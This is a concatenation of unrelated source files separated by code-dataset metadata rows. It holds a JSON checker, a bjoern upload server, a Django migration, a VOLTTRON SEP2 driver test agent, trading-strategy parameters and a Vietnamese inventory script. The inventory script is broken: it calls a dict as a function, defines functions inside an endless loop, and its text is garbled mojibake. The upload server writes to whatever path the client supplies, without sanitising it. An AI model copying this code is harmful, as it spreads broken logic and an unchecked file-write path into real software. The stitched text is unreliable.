# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
"""Evaluate the validity of a json file. Helps in debugging recipes.
Print the line and character position of any errors in the given json file.
Arguments
file - path to JSON file to be evaluated
Example
python project/helper.py project/sample.json
"""
import argparse
from starthinker.util.project import get_project
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', help='A JSON file.')
parser.add_argument('--debug', '-d', help='Debug mode, do not scrub newlines.', action='store_true')
args = parser.parse_args()
try:
project = get_project(args.file, debug=args.debug)
print 'JSON OK:', args.file
except Exception, e:
print 'JSON ERROR:', args.file, str(e)
| [
"[email protected]"
] | |
79bf0be94707c72897e7b2b72d58a43560d61f7d | 5708bbb9da243bec789a3ddff394e12cf89c956e | /tests/write_separate_files.py | 58e04e16985c97f39e36590ecec220a4b00e12f5 | [] | no_license | webclinic017/CacheFS | 39d9f2898ab3f9cf3dc0d1dd64a4a323be8fe09d | 8a50cfe0301e1938753817138411dcc4b0a68bcd | refs/heads/master | 2023-03-14T20:14:00.018678 | 2020-08-04T12:48:47 | 2020-08-04T12:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | import sys
import os
import shutil
num = int(sys.argv[1])
assert 0<num<20
port = 1234 + num
path = '/data/cache%d/yxr' % num
if not os.path.isdir(path):
os.makedirs(path)
def app(env, start_response):
name = path + env['PATH_INFO']
with open(name, 'w') as f:
shutil.copyfileobj(env['wsgi.input'], f)
start_response('200 ok', [('Content-Length', str(len(name)))])
return name
import bjoern
bjoern.run(app, '0.0.0.0', port)
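# Usage sketch (assumption, not part of the original file): send the file contents
# as the request body; for num=1 the server listens on port 1235, e.g.
#   curl --data-binary @payload.bin http://localhost:1235/payload.bin
# The response body echoes the path the file was written to under /data/cache1/yxr.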
| [
"[email protected]"
] | |
75efac61085d8599a4694b34ba6e566b551e5886 | 6773e281d2000faf724713571a326fe5440acce2 | /phone/migrations/0002_auto_20210320_2137.py | fff685720e89d0996234dbaf8a556e1cac735d1a | [] | no_license | abhisheksahu92/Phone-Directory | 4a16f69504e5153c29fbeceaad0c4a7e19f72c1c | 87ed73c015caf3c05364e02b6364756d2e1f87a4 | refs/heads/main | 2023-04-20T09:56:56.697106 | 2021-05-10T12:35:10 | 2021-05-10T12:35:10 | 349,765,236 | 0 | 0 | null | 2021-05-10T12:33:51 | 2021-03-20T15:37:39 | HTML | UTF-8 | Python | false | false | 405 | py | # Generated by Django 3.1.7 on 2021-03-20 16:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('phone', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='phonemodel',
name='middle_name',
field=models.CharField(blank=True, max_length=10, null=True),
),
]
| [
"[email protected]"
] | |
9b993cbfd369e7ff3ce902afd7a151cb5a0aeeec | ed79ce1f816daf0e9b27092a0cfdd24ed727994b | /services/core/SEP2Agent/tests/SEP2DriverTestAgent/test_agent/agent.py | 2b5e12e0e750b2908708cc6e80a8ec1eab675204 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | cbs-iiith/volttron | ca00430c5c89f612fbf8fedc7c65fb90cae16ee3 | a676d4af19a808581dde172ab08820087854e157 | refs/heads/dev-cbs-iiith | 2022-09-11T03:35:59.311254 | 2020-01-21T10:29:57 | 2020-01-21T10:29:57 | 59,084,828 | 2 | 0 | NOASSERTION | 2020-01-21T10:33:38 | 2016-05-18T05:31:50 | Python | UTF-8 | Python | false | false | 16,826 | py | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, SLAC National Laboratory / Kisensum Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor SLAC / Kisensum,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# SLAC / Kisensum. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# }}}
import gevent
import logging
import requests
import sys
from volttron.platform.vip.agent import Agent, Core
from volttron.platform.agent import utils
from volttron.platform.agent.known_identities import PLATFORM_DRIVER
_log = logging.getLogger(__name__)
utils.setup_logging()
__version__ = '1.0'
CYCLE_TIME = 3 # Seconds between sets of get_point/set_point calls
ALL_POINTS = [
'b1_Md',
'b1_Opt',
'b1_SN',
'b1_Vr',
'b113_A',
'b113_DCA',
'b113_DCV',
'b113_DCW',
'b113_PF',
'b113_WH',
'b120_AhrRtg',
'b120_ARtg',
'b120_MaxChaRte',
'b120_MaxDisChaRte',
'b120_WHRtg',
'b120_WRtg',
'b121_WMax',
'b122_ActWh',
'b122_StorConn',
'b124_WChaMax',
'b403_Tmp',
'b404_DCW',
'b404_DCWh',
'b802_LocRemCtl',
'b802_SoC',
'b802_State']
DEVICE_INFORMATION = """<DeviceInformation xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<functionsImplemented>0145</functionsImplemented>
<lFDI>5509D69F8B353595206AD71B47E27906318EA367</lFDI>
<mfDate>1388566800</mfDate>
<mfHwVer>MF-HW: 1.0.0</mfHwVer>
<mfID>37250</mfID>
<mfInfo>Mf Information</mfInfo>
<mfModel>Mf Model</mfModel>
<mfSerNum>1234567890</mfSerNum>
<primaryPower>2</primaryPower>
<secondaryPower>0</secondaryPower>
<swActTime>1416107035</swActTime>
<swVer>9bc8e7b_modified</swVer>
</DeviceInformation>
"""
DER_SETTINGS = """<DERSettings xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<setGradW>55000</setGradW>
<setMaxChargeRate>
<multiplier>1</multiplier>
<value>2</value>
</setMaxChargeRate>
<setMaxDischargeRate>
<multiplier>3</multiplier>
<value>4</value>
</setMaxDischargeRate>
<setMaxW>
<multiplier>1</multiplier>
<value>1</value>
</setMaxW>
<setStorConnect>true</setStorConnect>
<updatedTime>1416307137</updatedTime>
</DERSettings>"""
DER_STATUS = """<DERStatus xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<readingTime>1416270124</readingTime>
<stateOfChargeStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</stateOfChargeStatus>
<inverterStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</inverterStatus>
<storConnectStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</storConnectStatus>
<localControlModeStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</localControlModeStatus>
</DERStatus>"""
DER_AVAILABILITY = """<DERAvailability xmlns="http://zigbee.org/sep">
<availabilityDuration>55036</availabilityDuration>
<maxChargeDuration>3</maxChargeDuration>
<readingTime>1416304442</readingTime>
<reserveChargePercent>10000</reserveChargePercent>
<reservePercent>10000</reservePercent>
<statWAvail>
<multiplier>1</multiplier>
<value>1</value>
</statWAvail>
</DERAvailability>"""
DER_CAPABILITY = """<DERCapability xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<modesSupported>01</modesSupported>
<rtgAh>
<multiplier>1</multiplier>
<value>35</value>
</rtgAh>
<rtgA>
<multiplier>1</multiplier>
<value>33</value>
</rtgA>
<rtgMaxChargeRate>
<multiplier>1</multiplier>
<value>22</value>
</rtgMaxChargeRate>
<rtgMaxDischargeRate>
<multiplier>1</multiplier>
<value>1</value>
</rtgMaxDischargeRate>
<rtgMinPF>
<multiplier>1</multiplier>
<value>1</value>
</rtgMinPF>
<rtgW>
<multiplier>1</multiplier>
<value>1</value>
</rtgW>
<rtgWh>
<multiplier>1</multiplier>
<value>123</value>
</rtgWh>
<type>85</type>
</DERCapability>"""
POWER_STATUS = """<PowerStatus xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<batteryStatus>0</batteryStatus>
<changedTime>1416266598</changedTime>
<currentPowerSource>3</currentPowerSource>
<estimatedChargeRemaining>1</estimatedChargeRemaining>
<estimatedTimeRemaining>0</estimatedTimeRemaining>
<PEVInfo>
<chargingPowerNow>
<multiplier>0</multiplier>
<value>3000</value>
</chargingPowerNow>
<energyRequestNow>
<multiplier>0</multiplier>
<value>6100</value>
</energyRequestNow>
<maxForwardPower>
<multiplier>3</multiplier>
<value>7</value>
</maxForwardPower>
<minimumChargingDuration>4337</minimumChargingDuration>
<targetStateOfCharge>1000</targetStateOfCharge>
<timeChargeIsNeeded>1516266598</timeChargeIsNeeded>
<timeChargingStatusPEV>1516266598</timeChargingStatusPEV>
</PEVInfo>
<sessionTimeOnBattery>2</sessionTimeOnBattery>
<totalTimeOnBattery>2</totalTimeOnBattery>
</PowerStatus>"""
MUP = """<MirrorUsagePoint xmlns="http://zigbee.org/sep">
<mRID>0600006CC8</mRID>
<description>Gas Mirroring</description>
<roleFlags>13</roleFlags>
<serviceCategoryKind>1</serviceCategoryKind>
<status>1</status>
<deviceLFDI>247bd68e3378fe57ba604e3c8bdf9e3f78a3d743</deviceLFDI>
<MirrorMeterReading>
<mRID>0700006CC8</mRID>
<description>Cumulative Reading for Gas</description>
<Reading>
<value>125</value>
</Reading>
<ReadingType>
<accumulationBehaviour>9</accumulationBehaviour>
<commodity>7</commodity>
<dataQualifier>0</dataQualifier>
<flowDirection>1</flowDirection>
<powerOfTenMultiplier>3</powerOfTenMultiplier>
<uom>119</uom>
</ReadingType>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0800006CC8</mRID>
<description>Interval Readings for Gas</description>
<ReadingType>
<accumulationBehaviour>4</accumulationBehaviour>
<commodity>7</commodity>
<dataQualifier>0</dataQualifier>
<flowDirection>1</flowDirection>
<powerOfTenMultiplier>3</powerOfTenMultiplier>
<uom>119</uom>
</ReadingType>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0900006CC8</mRID>
<description>InstantPackCurrent</description>
<Reading>
<value>125</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0900006CC8</mRID>
<description>LineVoltageAvg</description>
<Reading>
<value>125</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0900006CC8</mRID>
<description>PhasePowerAvg</description>
<Reading>
<value>125</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>1000006CC8</mRID>
<description>PhasePFA</description>
<Reading>
<value>126</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>1100006CC8</mRID>
<description>EnergyIMP</description>
<Reading>
<value>127</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>1300006CC8</mRID>
<description>InstantPackTemp</description>
<Reading>
<value>128</value>
</Reading>
<ReadingType>
<accumulationBehaviour>9</accumulationBehaviour>
<commodity>7</commodity>
<dataQualifier>0</dataQualifier>
<flowDirection>1</flowDirection>
<powerOfTenMultiplier>3</powerOfTenMultiplier>
<uom>119</uom>
</ReadingType>
</MirrorMeterReading>
</MirrorUsagePoint>"""
MUP2 = """<MirrorUsagePoint xmlns="http://zigbee.org/sep">
<mRID>0600006CC8</mRID>
<description>Gas Mirroring</description>
<roleFlags>13</roleFlags>
<serviceCategoryKind>1</serviceCategoryKind>
<status>1</status>
<deviceLFDI>247bd68e3378fe57ba604e3c8bdf9e3f78a3d743</deviceLFDI>
<MirrorMeterReading>
<mRID>1200006CC8</mRID>
<description>EnergyEXP</description>
<Reading>
<value>128</value>
</Reading>
</MirrorMeterReading>
</MirrorUsagePoint>"""
MMR = """<MirrorMeterReading xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<mRID>6D6D72099BBDE9156400000000009182</mRID>
<description>PhaseCurrentAvg</description>
<Reading subscribable="0">
<timePeriod>
<duration>0</duration>
<start>2216441</start>
</timePeriod>
<value>24</value>
</Reading>
<ReadingType>
<accumulationBehaviour>12</accumulationBehaviour>
<commodity>0</commodity>
<dataQualifier>12</dataQualifier>
<flowDirection>0</flowDirection>
<kind>0</kind>
<phase>0</phase>
<powerOfTenMultiplier>0</powerOfTenMultiplier>
<uom>23</uom>
</ReadingType>
</MirrorMeterReading>"""
ASSERTED_VALUES = {
'b1_Md': 'Mf Model',
'b1_Opt': '247bd68e3378fe57ba604e3c8bdf9e3f78a3d743',
'b1_SN': '097935300833',
'b1_Vr': 'MF-HW: 1.0.0',
'b113_A': '24.0',
'b113_DCA': '125.0',
'b113_DCV': '125.0',
'b113_DCW': '125.0',
'b113_PF': '126.0',
'b113_WH': '127.0',
'b120_AhrRtg': '350.0',
'b120_ARtg': '330.0',
'b120_MaxChaRte': '220.0',
'b120_MaxDisChaRte': '10.0',
'b120_WHRtg': '1230.0',
'b120_WRtg': '10.0',
'b121_WMax': '20.0',
'b122_ActWh': '128.0',
'b122_StorConn': '777',
'b124_WChaMax': '10.0',
'b403_Tmp': '128000.0',
'b404_DCW': '3000.0',
'b404_DCWh': '305.755555556',
'b802_LocRemCtl': '777',
'b802_SoC': '7.77',
'b802_State': '777'}
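# Note (added for clarity): the asserted numbers are the XML test values after the
# driver applies each reading's power-of-ten multiplier, e.g. rtgAh above
# (value 35, multiplier 1) is asserted as b120_AhrRtg = 350.0, and rtgWh
# (value 123, multiplier 1) as b120_WHRtg = 1230.0.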
TEST_WEB_ADDRESS = 'http://127.0.0.1:8080'
DEFAULT_DRIVER = 'sep2_1'
class SEP2DriverTestAgent(Agent):
"""
Test the SEP2 driver (not a pytest regression test).
Load a test data set by posting XML to SEP2Agent (assumed to be at port 8080 on the local host).
Periodically send get_point for each point on the SEP2 driver.
Also send a set_point call to its der_control point, setting a power dispatch value.
This agent can be installed as follows:
export VIP_SOCKET="ipc://$VOLTTRON_HOME/run/vip.socket"
export SEP2_TEST_ROOT=$VOLTTRON_ROOT/services/core/SEP2Agent/tests/SEP2DriverTestAgent/test_agent
cd $VOLTTRON_ROOT
python scripts/install-agent.py \
-s $SEP2_TEST_ROOT \
-i sep2testagent \
-c $SEP2_TEST_ROOT/sep2drivertest.config \
-t sep2testagent \
-f
"""
def __init__(self, **kwargs):
super(SEP2DriverTestAgent, self).__init__(**kwargs)
self.default_config = {}
self.vip.config.set_default("config", self.default_config)
self.vip.config.subscribe(self.configure, actions=["NEW", "UPDATE"], pattern="config")
def configure(self, config_name, action, contents):
config = self.default_config.copy()
config.update(contents)
@Core.receiver('onstart')
def onstart(self, sender, **kwargs):
self.core.spawn(self.send_and_receive_points)
def send_and_receive_points(self):
self.post_test_data()
while True:
self.set_point('b124_WChaMax', ASSERTED_VALUES['b124_WChaMax'])
for point_name in ALL_POINTS:
expected_value = ASSERTED_VALUES[point_name]
received_value = self.get_point(point_name)
assert received_value == expected_value
gevent.sleep(CYCLE_TIME)
@staticmethod
def post_test_data():
"""Post XML test data for a SEP2 resource to the SEP2Agent."""
headers = {'content-type': 'application/sep+xml'}
requests.post('{}/dcap/edev/0/di'.format(TEST_WEB_ADDRESS), data=DEVICE_INFORMATION, headers=headers)
requests.post('{}/dcap/edev/0/der/1/derg'.format(TEST_WEB_ADDRESS), data=DER_SETTINGS, headers=headers)
requests.post('{}/dcap/edev/0/der/1/ders'.format(TEST_WEB_ADDRESS), data=DER_STATUS, headers=headers)
requests.post('{}/dcap/edev/0/der/1/dera'.format(TEST_WEB_ADDRESS), data=DER_AVAILABILITY, headers=headers)
requests.post('{}/dcap/edev/0/der/1/dercap'.format(TEST_WEB_ADDRESS), data=DER_CAPABILITY, headers=headers)
requests.post('{}/dcap/edev/0/ps'.format(TEST_WEB_ADDRESS), data=POWER_STATUS, headers=headers)
requests.post('{}/dcap/mup'.format(TEST_WEB_ADDRESS), data=MUP, headers=headers)
requests.post('{}/dcap/mup/0'.format(TEST_WEB_ADDRESS), data=MUP2, headers=headers)
requests.post('{}/dcap/mup/0'.format(TEST_WEB_ADDRESS), data=MMR, headers=headers)
def get_point(self, point_name, driver_name=None):
"""Issue a get_point RPC call for the named point and return the result."""
driver = driver_name if driver_name else DEFAULT_DRIVER
response = self.vip.rpc.call(PLATFORM_DRIVER, 'get_point', driver, point_name).get(timeout=10)
_log.debug('{}: Sent get_point for {}, received {}'.format(driver, point_name, response))
return response
def set_point(self, point_name, value, driver_name=None):
"""Issue a set_point RPC call for the named point and value, and return the result."""
driver = driver_name if driver_name else DEFAULT_DRIVER
self.vip.rpc.call(PLATFORM_DRIVER, 'set_point', driver, point_name, value)
_log.debug('{}: Sent set_point for {} = {}'.format(driver, point_name, value))
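# Note (observation, not in the original): unlike get_point, set_point above does not
# call .get() on the RPC result, so it fires without awaiting success; a blocking
# variant would be, e.g.
#   self.vip.rpc.call(PLATFORM_DRIVER, 'set_point', driver, point_name, value).get(timeout=10)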
def test_sep2_agent(config_path, **kwargs):
return SEP2DriverTestAgent(**kwargs)
def main():
utils.vip_main(test_sep2_agent, identity='sep2testagent', version=__version__)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
dd68c7efbbedecd20d7e2eff84b6e32ac1718b24 | 1065a2782e4947b5bf14ec4536e4ad7addc7aec3 | /strategy/crystalball/cbparameters.py | 8c14b84a9ff8bc41f5a523fbe7de690157eb87d1 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | Johannesduvenage/siis | 0bf6875d4a5f3638cadb01ed5541aab29ba1d77a | 57e537cf9b6a71c8ad0b3bb0759772d126496a17 | refs/heads/master | 2020-09-10T21:51:56.814014 | 2019-11-13T23:57:34 | 2019-11-13T23:57:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,831 | py | # @date 2019-01-19
# @author Frederic SCHERMA
# @license Copyright (c) 2019 Dream Overflow
# Crystal ball strategy indicator default parameters.
DEFAULT_PARAMS = {
"reversal": True,
"pyramided": 0,
"hedging": False,
"max-trades": 3, # max number of simultaned trades for a same market
"trade-delay": 30, # at least wait 30 seconds before sending another signal
"base-timeframe": "t", # process each time strategy receive a tick
"min-traded-timeframe": "1m",
"max-traded-timeframe": "4h",
"min-vol24h": 100, # 300 BTC per 24h
"min-price": 0.00000069, # or 69 sats (to binary otherwise)
"timeframes": {
"4hour": {
"timeframe": "4h",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 1.0), # was 1.5 , but too large else
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"hourly": {
"timeframe": "1h",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 1.0), # was 1.5 , but too large else
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"15min": {
"timeframe": "15m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 1.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"5min": {
"timeframe": "5m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 3.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"2min":{
"timeframe": "2m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 3.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"1min": {
"timeframe": "1m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": True,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 3.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
}
}
}
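# Note (reading of the structure above, not documented in the original): each entry in
# "indicators" maps a name to a tuple of (indicator_type, *parameters), e.g.
# ("rsi", 21) for a 21-period RSI or ("atr", 14, 3.0) for a 14-period ATR with a 3.0
# multiplier; the exact parameter meanings are an assumption based on common usage and
# depend on the strategy's indicator setup code.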
| [
"[email protected]"
] | |
f8c640ad9578ce1e96ba5f59ec9a5fe0ccec315b | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project/.history/product_20211028131744.py | 21593a603e8e73c799d5612010a2ae348848b646 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 9,428 | py | import data as list_product
import random
# def __init__(self, Id, Product_code, Product_name, Brand, Year, Size):
# self.Id = Id
# self.Product_code = Product_code
# self.Product_name = Product_name
# self.Brand = Brand
# self.Year = Year
# self.Size = Size
# Thรชm sแบฃn phแบฉm
def AddProduct():
print("THรM SแบขN PHแบจM")
product = {
"Id": "",
"Product_code": "",
"Product_name": "",
"Brand": "",
"Price": "",
"Year": "",
"Quantity": "",
"Size": "",
"Status": ""
}
pd = product("g", "chs333", "Truyแปn bแบฃy viรชn ngแปc rแปng",
"3", "", 2, 2, "g", "f")
print("Nhแบญp ID sแบฃn phแบฉm:")
Id = int(input())
while True:
student = FindProductDuplicate(Id)
if student != False:
print("ID ฤรฃ tแปn tแบกi, vui lรฒng nhแบญp lแบกi ID:")
Id = int(input())
else:
break
product['Id'] = Id
# Mรฃ sแบฃn phแบฉm random
code_product = random.randint(1, 99)
str_id = "HKSP"
if code_product <= 9:
str_id += "0" + str(code_product)
else:
str_id += str(code_product)
product["Product_code"] = str_id
print("Nhแบญp tรชn sแบฃn phแบฉm: ")
product['Product_name'] = input()
print("Nhแบญp thฦฐฦกng hiแปu sแบฃn phแบฉm: ")
product['Brand'] = input()
print("Nhแบญp giรก sแบฃn phแบฉm: ")
product['Price'] = float(input())
print("Nhแบญp nฤm sแบฃn xuแบฅt: ")
product['Year'] = int(input())
print("Nhแบญp sแป lฦฐแปฃng: ")
product['Quantity'] = int(input())
print("Nhแบญp size giร y: ")
product['Size'] = input()
print("Nhแบญp tรฌnh trแบกng sแบฃn phแบฉm: ")
product['Status'] = input()
list_product.list_product.append(pd)
list_product.list_product.append(product)
answer = input("Bแบกn cรณ muแปn nhแบญp tiแบฟp khรดng? Y/N ")
if answer == "y" or answer == "Y":
AddProduct()
print("********************************")
# Tรฌm kiแบฟm ID trรนng lแบทp
def FindProductDuplicate(Id):
for i in range(0, len(list_product.list_product)):
if list_product.list_product[i]['Id'] == Id:
return [i, list_product.list_product[i]]
return False
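# Note (added for clarity): FindProductDuplicate returns [index, product_dict] when a
# matching Id exists, and False otherwise; callers read product[0] for the list
# position and product[1] for the dict itself.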
# Hiแปn thแป tแบฅt cแบฃ sแบฃn phแบฉm
def ShowAllProduct():
print("*** HIแปN THแป TแบคT Cแบข SแบขN PHแบจM ***")
if len(list_product.list_product) == 0 or len(list_product.list_product) < 0:
print("Chฦฐa cรณ sแบฃn phแบฉm nร o ฤแป hiแปn thแป! ".upper())
for i in range(0, len(list_product.list_product)):
print("ID : \t", list_product.list_product[i]['Id']),
print("Mรฃ sแบฃn phแบฉm : \t", list_product.list_product[i]['Product_code']),
print("Tรชn sแบฃn phแบฉm : \t", list_product.list_product[i]['Product_name']),
print("Thฦฐฦกng hiแปu : \t", list_product.list_product[i]['Brand']),
print("Giรก : \t", list_product.list_product[i]['Price']),
print("Nฤm xuแบฅt bแบฃn : \t", list_product.list_product[i]['Year']),
print("Sแป lฦฐแปฃng : \t", list_product.list_product[i]['Quantity']),
print("Size giร y : \t", list_product.list_product[i]['Size'])
print("Tรฌnh trแบกng : \t", list_product.list_product[i]['Status'])
print("________________________________")
# Sแปญa thรดng tin sแบฃn phแบฉm
def UpdateProduct():
print("*** CแบฌP NHแบฌT THรNG TIN SแบขN PHแบจM ***")
print("Nhแบญp ID sแบฃn phแบฉm cแบงn sแปญa")
Id = int(input())
product = FindProductDuplicate(Id)
if product == False:
print("Khรดng tรฌm thแบฅy sแบฃn phแบฉm ID = ".upper(), Id)
print("********************************")
else:
print("""Bแบกn muแปn cแบญp nhแบญt mแปฅc nร o ? :
0. Thoรกt.
1. Tรชn sแบฃn phแบฉm.
2. Thฦฐฦกng hiแปu sแบฃn phแบฉm.
3. Giรก sแบฃn phแบฉm
4. Size giร y.
5. Sแป lฦฐแปฃng.
6. Nฤm xuแบฅt bแบฃn.
7. Tรฌnh trแบกng """)
action = 0
while action >= 0:
if action == 1:
UpdateProductName()
elif action == 2:
UpdateProductBrand()
elif action == 3:
UpdateProductPrice()
elif action == 4:
UpdateProductSize()
elif action == 5:
UpdateProductQuatity()
elif action == 6:
UpdateProductYear()
elif action == 7:
UpdateStatus()
def UpdateProductName():
print("Nhแบญp tรชn cแบญp nhแบญt cแปงa sแบฃn phแบฉm: ")
name_product = input()
product[1]['Product_name'] = name_product
def UpdateProductBrand():
print("Nhแบญp thฦฐฦกng hiแปu muแปn cแบญp nhแบญt: ")
name_product = input()
product[1]['Brand'] = name_product
def UpdateProductPrice():
print("Nhแบญp giรก muแปn cแบญp nhแบญt: ")
name_product = float(input())
product[1]['Price'] = name_product
def UpdateProductSize():
print("Nhแบญp size muแปn cแบญp nhแบญt: ")
name_product = input()
product[1]['Size'] = name_product
def UpdateProductYear():
print("Nhแบญp nฤm sแบฃn xuแบฅt muแปn cแบญp nhแบญt: ")
name_product = int(input())
product[1]['Year'] = name_product
list_product.list_product[product[0]] = product[1]
def UpdateProductQuatity():
print("Nhแบญp sแป lฦฐแปฃng muแปn cแบญp nhแบญt: ")
name_product = int(input())
product[1]['Quantity'] = name_product
list_product.list_product[product[0]] = product[1]
def UpdateStatus():
print("Nhแบญp tรฌnh trแบกng muแปn cแบญp nhแบญt: ")
name_product = input()
product[1]['Status'] = name_product
list_product.list_product[product[0]] = product[1]
action = int(input("Bแบกn chแปn mแปฅc cแบญp nhแบญt nร o? "))
if action == 0:
print("Khรดng cแบญp nhแบญt mแปฅc nร o".upper())
print("********************************")
break
# Xรณa sแบฃn phแบฉm
def DeleteProduct():
